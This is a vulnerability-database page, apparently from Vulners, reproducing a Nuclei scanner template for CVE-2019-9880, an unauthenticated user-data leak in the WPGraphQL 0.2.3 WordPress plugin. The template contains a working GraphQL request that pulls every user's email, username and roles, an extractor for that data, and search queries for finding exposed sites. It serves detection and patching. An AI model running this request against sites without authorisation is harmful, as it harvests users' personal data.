Lucene search
K

WPEngine WPGraphQL 0.2.3 - Unauthenticated User Information Disclosure

🗓️ 28 Jun 2026 03:02:45Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

Unauthenticated disclosure in WordPress WPGraphQL 0.2.3 exposes all user details; upgrade to 0.3.0+.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
WordPress WPGraphQL 0.2.3 Plugin - Multiple Vulnerabilities
21 May 201900:00
zdt
Circl
CVE-2019-9880
16 Sep 202522:09
circl
CNVD
WordPress WPGraphQL Access Control Error Vulnerability (CNVD-2019-27674)
23 May 201900:00
cnvd
Check Point Advisories
WordPress Plugin WPGraphQL Information Disclosure (CVE-2019-9879; CVE-2019-9880; CVE-2019-9881)
24 Jun 201900:00
checkpoint_advisories
CVE
CVE-2019-9880
10 Jun 201917:32
cve
Cvelist
CVE-2019-9880
10 Jun 201917:32
cvelist
NVD
CVE-2019-9880
10 Jun 201918:29
nvd
Packet Storm
WordPress WPGraphQL 0.2.3 Authentication Bypass / Information Disclosure
21 May 201900:00
packetstorm
Prion
Design/Logic Flaw
10 Jun 201918:29
prion
Positive Technologies
PT-2019-19913
10 Jun 201900:00
ptsecurity
Rows per page
id: CVE-2019-9880

info:
  name: WPEngine WPGraphQL 0.2.3 - Unauthenticated User Information Disclosure
  author: intelligent-ears
  severity: critical
  description: |
    An issue was discovered in the WPGraphQL 0.2.3 plugin for WordPress. By querying the 'users' RootQuery, it is possible, for an unauthenticated attacker, to retrieve all WordPress users details such as email address, role, and username.
  impact: |
    An attacker can exploit this vulnerability to enumerate all WordPress users and extract sensitive information including email addresses, usernames, and user roles without authentication.
  remediation: |
    Update WPGraphQL to version 0.3.0 or later to fix this vulnerability.
  reference:
    - http://packetstormsecurity.com/files/153025/WordPress-WPGraphQL-0.2.3-Authentication-Bypass-Information-Disclosure.html
    - https://github.com/pentestpartners/snippets/blob/master/wp-graphql0.2.3_exploit.py
    - https://github.com/wp-graphql/wp-graphql/releases/tag/v0.3.0
    - https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2019-9880
    cwe-id: CWE-306
    epss-score: 0.34761
    epss-percentile: 0.98218
    cpe: cpe:2.3:a:wpengine:wpgraphql:0.2.3:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wpengine
    product: wpgraphql
    framework: wordpress
    fofa-query: body="/wp-content/plugins/wp-graphql/"
    publicwww-query: "/wp-content/plugins/wp-graphql/"
  tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,info-leak,vkev,vuln

http:
  - raw:
      - |
        POST /graphql HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"query": "query { users { nodes { id name email username roles } } }"}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "{\"data\":{", "\"name\":", "\"roles\":")
          - contains(content_type, "application/json")
          - status_code == 200
        condition: and

    extractors:
      - type: json
        name: user-data
        json:
          - '.data.users.nodes[] | "username: " + .username + ", email: " + .email'
# digest: 490a00463044022021d31dab2c56243ce9ffe2fd84914d578330821e1a0dcf05522f3c5a125224d8022071a1b2c3a3c33e7f847a4e821189e6536d6e5dc4fc5dd2ae6809834c2a602096:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 26.4
CVSS 39.1
EPSS0.34761
SSVC
23